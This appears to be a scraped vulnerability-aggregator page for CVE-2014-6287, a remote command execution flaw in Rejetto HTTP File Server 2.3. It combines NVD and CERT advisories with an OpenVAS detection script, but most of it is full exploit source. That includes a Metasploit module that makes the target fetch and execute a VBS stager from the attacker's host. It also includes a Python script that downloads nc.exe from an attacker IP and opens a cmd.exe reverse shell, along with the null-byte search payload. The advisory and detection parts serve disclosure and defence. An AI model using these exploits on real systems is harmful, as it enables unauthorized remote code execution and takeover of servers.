Search...

HttpFileServer code execution

2014-10-15T00:00:00

ID SECURITYVULNS:VULN:14023
Type securityvulns
Reporter BUGTRAQ
Modified 2014-10-15T00:00:00

Description

Code execution via GET request.

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:VULN:14023", "bulletinFamily": "software", "title": "HttpFileServer code execution", "description": "Code execution via GET request.", "published": "2014-10-15T00:00:00", "modified": "2014-10-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14023", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31217"], "cvelist": ["CVE-2014-6287"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:57", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "dd6e37075dc82f17501a14dfd8cf9b92"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "ba01aa37cae671cddcb65dd6be5deec7"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "4918676c98bea0441a0e82882878ce02"}, {"key": "href", "hash": "43407cfb2eea612e8671e6804bbf452c"}, {"key": "modified", "hash": "5cb566ab587286cf523f4cd33a5ffa84"}, {"key": "published", "hash": "5cb566ab587286cf523f4cd33a5ffa84"}, {"key": "references", "hash": "342e1471156f4d60fd7f5ea7222a56e8"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "7359c84487d54b3887019005574cc2da"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "201b27ffeb7eae9040ce743ac6f3d2e37fcee7f4d271cf1acde6613a9749714c", "viewCount": 0, "enchantments": {"score": {"value": 9.3, "vector": "NONE", "modified": "2018-08-31T11:09:57"}, "vulnersScore": 9.3}, "objectVersion": "1.3", "affectedSoftware": [{"name": "HttpFileServer", "operator": "eq", "version": "2.3"}]}

{"cve": [{"lastseen": "2017-04-18T15:55:16", "references": ["https://github.com/rapid7/metasploit-framework/pull/3793", "https://www.exploit-db.com/exploits/39161/", "http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html", "http://www.kb.cert.org/vuls/id/251276", "http://packetstormsecurity.com/files/135122/Rejetto-HTTP-File-Server-2.3.x-Remote-Code-Execution.html"], "edition": 2, "description": "The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.", "reporter": "NVD", "published": "2014-10-07T06:55:04", "title": "CVE-2014-6287", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-6287"], "scanner": [], "modified": "2016-12-06T22:00:55", "cpe": ["cpe:/a:rejetto:http_file_server:2.3b"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6287", "id": "CVE-2014-6287", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2018-08-31T02:38:11", "references": ["http://www.rejetto.com/hfs/?f=dl", "http://cwe.mitre.org/data/definitions/158.html", "http://cwe.mitre.org/data/definitions/158.html", "http://www.rejetto.com/hfs/", "https://github.com/rapid7/metasploit-framework/pull/3793", "http://cwe.mitre.org/data/definitions/185.html", "http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6287", "http://sourceforge.net/projects/hfs/"], "description": "### Overview\n\nRejetto HTTP File Server (HFS) search feature in versions 2.3, 2.3a, and 2.3b fails to handle null bytes.\n\n### Description\n\n[](<http://cwe.mitre.org/data/definitions/185.html>)[**CWE-158**](<http://cwe.mitre.org/data/definitions/158.html>)**: Improper Neutralization of Null Byte or NUL Character** \\- CVE-2014-6287 \n\nRejetto HFS versions 2.3, 2.3a, and 2.3b are vulnerable to remote command execution due to a regular expression in `parserLib.pas` that fails to handle null bytes. Commands that follow a null byte in the search string are executed on the host system. As an example, the following search submitted to a vulnerable HFS instance launches calculator on the host Microsoft Windows system: \n \nhttp://<vulnerable instance>/?search==%00{.exec|calc.} \n \nNote that this vulnerability is being exploited in the wild. A Metasploit module has been released to exploit this vulnerability. \n \n--- \n \n### Impact\n\nA remote, unauthenticated user may be able to run arbitrary operating system commands on the server. \n \n--- \n \n### Solution\n\n**Apply an update** \nThis issue is addressed in HFS version 2.3c and later, [available here](<http://www.rejetto.com/hfs/?f=dl>). \n \n--- \n \n### Vendor Information \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nRejetto| | 03 Oct 2014| 06 Oct 2014 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23251276 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.2 | E:F/RL:OF/RC:C \nEnvironmental | 4.6 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n### References\n\n * <http://cwe.mitre.org/data/definitions/158.html>\n * <http://www.rejetto.com/hfs/>\n * <http://sourceforge.net/projects/hfs/>\n * <http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html>\n * <https://github.com/rapid7/metasploit-framework/pull/3793>\n\n### Credit\n\nThis document was written by Joel Land.\n\n### Other Information\n\n * CVE IDs: [CVE-2014-6287](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6287>)\n * Date Public: 11 Sep 2014\n * Date First Published: 06 Oct 2014\n * Date Last Updated: 06 Oct 2014\n * Document Revision: 14\n\n", "edition": 3, "reporter": "CERT", "published": "2014-10-06T00:00:00", "title": "Rejetto HTTP File Server (HFS) search feature fails to handle null bytes", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-6287", "CVE-2014-6287", "CVE-2014-6287"], "modified": "2014-10-06T00:00:00", "id": "VU:251276", "href": "https://www.kb.cert.org/vuls/id/251276", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-09-20T16:07:08", "references": ["http://packetstormsecurity.com/files/128593", "https://www.exploit-db.com/exploits/39161/", "https://www.kb.cert.org/vuls/id/251276"], "pluginID": "1361412562310806814", "description": "This host is running HTTP File Server\n and is prone to remote command execution vulnerability.", "edition": 4, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-01-11T00:00:00", "title": "HTTP File Server Remote Command Execution Vulnerability-02 Jan16", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-6287"], "modified": "2018-09-19T00:00:00", "id": "OPENVAS:1361412562310806814", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806814", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_http_file_server_mult_vuln02_jan16.nasl 11473 2018-09-19 11:21:09Z asteins $\n#\n# HTTP File Server Remote Command Execution Vulnerability-02 Jan16\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:httpfilesever:hfs\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806814\");\n script_version(\"$Revision: 11473 $\");\n script_cve_id(\"CVE-2014-6287\");\n script_bugtraq_id(69782);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-19 13:21:09 +0200 (Wed, 19 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-11 15:22:37 +0530 (Mon, 11 Jan 2016)\");\n script_name(\"HTTP File Server Remote Command Execution Vulnerability-02 Jan16\");\n\n script_tag(name:\"summary\", value:\"This host is running HTTP File Server\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper\n neutralization of Null byte or NUL character\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code by uploading a file with certain invalid\n UTF-8 byte sequences that are interpreted as executable macro symbols.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"affected\", value:\"HttpFileServer version 2.3g and prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/128593\");\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/251276\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39161/\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_http_file_server_detect.nasl\");\n script_mandatory_keys(\"hfs/Installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ninclude(\"host_details.inc\");\n\nif(!hfsPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!hfsVer = get_app_version(cpe:CPE, port:hfsPort)){\n exit(0);\n}\n\nif(version_is_less_equal(version:hfsVer, test_version:\"2.3g\"))\n{\n report = 'Installed Version: ' + hfsVer + '\\n' +\n 'Fixed Version: Not available' + '\\n';\n security_message(port:hfsPort, data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T23:42:43", "osvdbidlist": ["111386"], "references": [], "description": "Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1). CVE-2014-6287. Remote exploit for windows platform", "edition": 1, "reporter": "Daniele Linguaglossa", "published": "2014-09-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Rejetto HTTP File Server HFS 2.3.x - Remote Command Execution 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-09-15T00:00:00", "id": "EDB-ID:34668", "href": "https://www.exploit-db.com/exploits/34668/", "sourceData": "# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\r\n# Google Dork: intext:\"httpfileserver 2.3\"\r\n# Date: 11-09-2014\r\n# Remote: Yes\r\n# Exploit Author: Daniele Linguaglossa\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n\r\nissue exists due to a poor regex in the file ParserLib.pas\r\n\r\n\r\nfunction findMacroMarker(s:string; ofs:integer=1):integer;\r\nbegin result:=reMatch(s, '\\{[.:]|[.:]\\}|\\|', 'm!', ofs) end;\r\n\r\n\r\nit will not handle null byte so a request to\r\n\r\nhttp://localhost:80/?search=%00{.exec|cmd.}\r\n\r\nwill stop regex from parse macro , and macro will be executed and remote code injection happen.\r\n\r\n\r\n## EDB Note: This vulnerability will run the payload multiple times simultaneously. \r\n## Make sure to take this into consideration when crafting your payload (and/or listener).", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34668/"}, {"lastseen": "2016-02-04T00:13:49", "osvdbidlist": ["111386"], "references": [], "description": "Rejetto HttpFileServer Remote Command Execution. CVE-2014-6287. Remote exploit for windows platform", "edition": 1, "reporter": "metasploit", "published": "2014-10-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "exploitdb", "title": "Rejetto HttpFileServer Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-10-09T00:00:00", "id": "EDB-ID:34926", "href": "https://www.exploit-db.com/exploits/34926/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Rejetto HttpFileServer Remote Command Execution\",\r\n 'Description' => %q{\r\n Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a\r\n poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by\r\n using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b\r\n over Windows XP SP3, Windows 7 SP1 and Windows 8.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery\r\n 'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6287'],\r\n ['OSVDB', '111386'],\r\n ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'],\r\n ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands']\r\n ],\r\n 'Payload' => { 'BadChars' => \"\\x0d\\x0a\\x00\" },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n ],\r\n 'Privileged' => false,\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => \"Sep 11 2014\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path of the web application', '/']),\r\n OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => '/'\r\n })\r\n\r\n if res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\\d.]+)/\r\n version = $1\r\n if Gem::Version.new(version) <= Gem::Version.new(\"2.3\")\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def on_request_uri(cli, req)\r\n print_status(\"#{peer} - Payload request received: #{req.uri}\")\r\n exe = generate_payload_exe\r\n vbs = Msf::Util::EXE.to_exe_vbs(exe)\r\n send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'})\r\n # remove resource after serving 1st request as 'exec' execute 4x\r\n # during exploitation\r\n remove_resource(get_resource)\r\n end\r\n\r\n def primer\r\n file_name = rand_text_alpha(rand(10)+5)\r\n file_ext = '.vbs'\r\n file_full_name = file_name + file_ext\r\n vbs_path = \"%TEMP%\\\\#{file_full_name}\"\r\n\r\n vbs_code = \"Set x=CreateObject(\\\"Microsoft.XMLHTTP\\\")\\x0d\\x0a\"\r\n vbs_code << \"On Error Resume Next\\x0d\\x0a\"\r\n vbs_code << \"x.Open \\\"GET\\\",\\\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\\\",False\\x0d\\x0a\"\r\n vbs_code << \"If Err.Number <> 0 Then\\x0d\\x0a\"\r\n vbs_code << \"wsh.exit\\x0d\\x0a\"\r\n vbs_code << \"End If\\x0d\\x0a\"\r\n vbs_code << \"x.Send\\x0d\\x0a\"\r\n vbs_code << \"Execute x.responseText\"\r\n\r\n payloads = [\r\n \"save|#{vbs_path}|#{vbs_code}\",\r\n \"exec|wscript.exe //B //NOLOGO #{vbs_path}\"\r\n ]\r\n\r\n print_status(\"Sending a malicious request to #{target_uri.path}\")\r\n payloads.each do |payload|\r\n send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => \"/?search=%00{.#{URI::encode(payload)}.}\"\r\n })\r\n end\r\n register_file_for_cleanup(vbs_path)\r\n end\r\n\r\n def exploit\r\n begin\r\n Timeout.timeout(datastore['HTTPDELAY']) { super }\r\n rescue Timeout::Error\r\n # When the server stops due to our timeout, this is raised\r\n end\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34926/"}, {"lastseen": "2016-02-04T09:37:29", "osvdbidlist": ["111386"], "references": [], "description": "Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution. CVE-2014-6287. Remote exploit for windows platform", "edition": 1, "reporter": "Avinash Thapa", "published": "2016-01-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "Rejetto HTTP File Server HFS 2.3.x - Remote Command Execution 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2016-01-04T00:00:00", "id": "EDB-ID:39161", "href": "https://www.exploit-db.com/exploits/39161/", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\r\n# Google Dork: intext:\"httpfileserver 2.3\"\r\n# Date: 04-01-2016\r\n# Remote: Yes\r\n# Exploit Author: Avinash Kumar Thapa aka \"-Acid\"\r\n# Vendor Homepage: http://rejetto.com/\r\n# Software Link: http://sourceforge.net/projects/hfs/\r\n# Version: 2.3.x\r\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\r\n# CVE : CVE-2014-6287\r\n# Description: You can use HFS (HTTP File Server) to send and receive files.\r\n#\t It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.\r\n#\t It also differs from classic web servers because it's very easy to use and runs \"right out-of-the box\". Access your remote files, over the network. It has been successfully tested with Wine under Linux. \r\n \r\n#Usage : python Exploit.py <Target IP address> <Target Port Number>\r\n\r\n#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). \r\n# You may need to run it multiple times for success!\r\n\r\n\r\nimport urllib2\r\nimport sys\r\n\r\ntry:\r\n\tdef script_create():\r\n\t\turllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+save+\".}\")\r\n\r\n\tdef execute_script():\r\n\t\turllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe+\".}\")\r\n\r\n\tdef nc_run():\r\n\t\turllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe1+\".}\")\r\n\r\n\tip_addr = \"192.168.44.128\" #local IP address\r\n\tlocal_port = \"443\" # Local Port number\r\n\tvbs = \"C:\\Users\\Public\\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F\"+ip_addr+\"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with\"\r\n\tsave= \"save|\" + vbs\r\n\tvbs2 = \"cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs\"\r\n\texe= \"exec|\"+vbs2\r\n\tvbs3 = \"C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20\"+ip_addr+\"%20\"+local_port\r\n\texe1= \"exec|\"+vbs3\r\n\tscript_create()\r\n\texecute_script()\r\n\tnc_run()\r\nexcept:\r\n\tprint \"\"\"[.]Something went wrong..!\r\n\tUsage is :[.] python exploit.py <Target IP address> <Target Port Number>\r\n\tDon't forgot to change the Local IP address and Port number on the script\"\"\"\r\n\t\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39161/"}], "packetstorm": [{"lastseen": "2016-12-05T22:24:25", "references": [], "edition": 1, "description": "", "reporter": "Muhamad Fadzil Ramli", "published": "2014-10-08T00:00:00", "type": "packetstorm", "title": "Rejetto HttpFileServer Remote Command Execution", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-10-08T00:00:00", "href": "https://packetstormsecurity.com/files/128593/Rejetto-HttpFileServer-Remote-Command-Execution.html", "id": "PACKETSTORM:128593", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Rejetto HttpFileServer Remote Command Execution\", \n'Description' => %q{ \nRejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a \npoor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by \nusing '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b \nover Windows XP SP3, Windows 7 SP1 and Windows 8. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery \n'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module \n], \n'References' => \n[ \n['CVE', '2014-6287'], \n['OSVDB', '111386'], \n['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], \n['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'] \n], \n'Payload' => { 'BadChars' => \"\\x0d\\x0a\\x00\" }, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n], \n'Privileged' => false, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'DisclosureDate' => \"Sep 11 2014\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The path of the web application', '/']), \nOptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]), \n], self.class) \nend \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/' \n}) \n \nif res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\\d.]+)/ \nversion = $1 \nif Gem::Version.new(version) <= Gem::Version.new(\"2.3\") \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef on_request_uri(cli, req) \nprint_status(\"#{peer} - Payload request received: #{req.uri}\") \nexe = generate_payload_exe \nvbs = Msf::Util::EXE.to_exe_vbs(exe) \nsend_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) \n# remove resource after serving 1st request as 'exec' execute 4x \n# during exploitation \nremove_resource(get_resource) \nend \n \ndef primer \nfile_name = rand_text_alpha(rand(10)+5) \nfile_ext = '.vbs' \nfile_full_name = file_name + file_ext \nvbs_path = \"%TEMP%\\\\#{file_full_name}\" \n \nvbs_code = \"Set x=CreateObject(\\\"Microsoft.XMLHTTP\\\")\\x0d\\x0a\" \nvbs_code << \"On Error Resume Next\\x0d\\x0a\" \nvbs_code << \"x.Open \\\"GET\\\",\\\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\\\",False\\x0d\\x0a\" \nvbs_code << \"If Err.Number <> 0 Then\\x0d\\x0a\" \nvbs_code << \"wsh.exit\\x0d\\x0a\" \nvbs_code << \"End If\\x0d\\x0a\" \nvbs_code << \"x.Send\\x0d\\x0a\" \nvbs_code << \"Execute x.responseText\" \n \npayloads = [ \n\"save|#{vbs_path}|#{vbs_code}\", \n\"exec|wscript.exe //B //NOLOGO #{vbs_path}\" \n] \n \nprint_status(\"Sending a malicious request to #{target_uri.path}\") \npayloads.each do |payload| \nsend_request_raw({ \n'method' => 'GET', \n'uri' => \"/?search=%00{.#{URI::encode(payload)}.}\" \n}) \nend \nregister_file_for_cleanup(vbs_path) \nend \n \ndef exploit \nbegin \nTimeout.timeout(datastore['HTTPDELAY']) { super } \nrescue Timeout::Error \n# When the server stops due to our timeout, this is raised \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128593/rejetto_hfs_exec.rb.txt"}, {"lastseen": "2016-12-05T22:18:41", "references": [], "edition": 1, "description": "", "reporter": "Avinash Kumar Thapa", "published": "2016-01-04T00:00:00", "type": "packetstorm", "title": "Rejetto HTTP File Server 2.3.x Remote Code Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2016-01-04T00:00:00", "href": "https://packetstormsecurity.com/files/135122/Rejetto-HTTP-File-Server-2.3.x-Remote-Code-Execution.html", "id": "PACKETSTORM:135122", "sourceData": "`#!/usr/bin/python \n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution \n# Google Dork: intext:\"httpfileserver 2.3\" \n# Date: 04-01-2016 \n# Remote: Yes \n# Exploit Author: Avinash Kumar Thapa aka \"-Acid\" \n# Vendor Homepage: http://rejetto.com/ \n# Software Link: http://sourceforge.net/projects/hfs/ \n# Version: 2.3.x \n# Tested on: Windows Server 2008 , Windows 8, Windows 7 \n# CVE : CVE-2014-6287 \n# Description: You can use HFS (HTTP File Server) to send and receive files. \n# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. \n# It also differs from classic web servers because it's very easy to use and runs \"right out-of-the box\". Access your remote files, over the network. It has been successfully tested with Wine under Linux. \n \n#Usage : python Exploit.py <Target IP address> <Target Port Number> \n \n \nimport urllib2 \nimport sys \n \ntry: \ndef script_create(): \nurllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+save+\".}\") \n \ndef execute_script(): \nurllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe+\".}\") \n \ndef nc_run(): \nurllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe1+\".}\") \n \nip_addr = \"192.168.44.128\" #local IP address \nlocal_port = \"443\" # Local Port number \nvbs = \"C:\\Users\\Public\\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F\"+ip_addr+\"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with\" \nsave= \"save|\" + vbs \nvbs2 = \"cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs\" \nexe= \"exec|\"+vbs2 \nvbs3 = \"C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20\"+ip_addr+\"%20\"+local_port \nexe1= \"exec|\"+vbs3 \nscript_create() \nexecute_script() \nnc_run() \nexcept: \nprint \"\"\"[.]Something went wrong..! \nUsage is :[.] python exploit.py <Target IP address> <Target Port Number> \nDon't forgot to change the Local IP address and Port number on the script\"\"\" \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": 